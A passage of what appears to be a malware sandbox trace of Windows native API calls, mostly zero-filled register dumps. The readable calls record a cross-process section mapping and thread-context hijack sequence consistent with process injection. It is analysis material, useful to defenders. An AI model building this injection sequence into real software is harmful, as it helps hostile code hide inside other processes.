[299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.053] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0141.053] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x109200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x10a000) returned 0x0 [0141.059] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x109200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5c0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x10a000) returned 0x0 [0141.078] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0141.084] NtClose (Handle=0x1a8) returned 0x0 [0141.084] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x395000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x636717, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.086] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0141.086] NtClose (Handle=0x1a0) returned 0x0 [0141.087] NtClose (Handle=0x1a4) returned 0x0 [0141.087] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x12c4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0141.087] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0141.087] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0141.087] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x394000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0141.087] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0141.091] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x12c8) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0141.091] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0141.091] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x8450000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0141.517] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x1, Esi=0x1, Ebx=0x1, Edx=0x0, Ecx=0x0, Eax=0xe8, Ebp=0x19f7cc, Eip=0x774d725c, SegCs=0x23, EFlags=0x206, Esp=0x19f63c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.517] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0141.518] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x193200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7650000, SectionOffset=0x0, ViewSize=0xde6ac*=0x194000) returned 0x0 [0141.533] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x193200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x8e20000, SectionOffset=0x0, ViewSize=0xde6e8*=0x194000) returned 0x0 [0141.601] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7650000) returned 0x0 [0141.637] NtClose (Handle=0x1a8) returned 0x0 [0141.637] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, 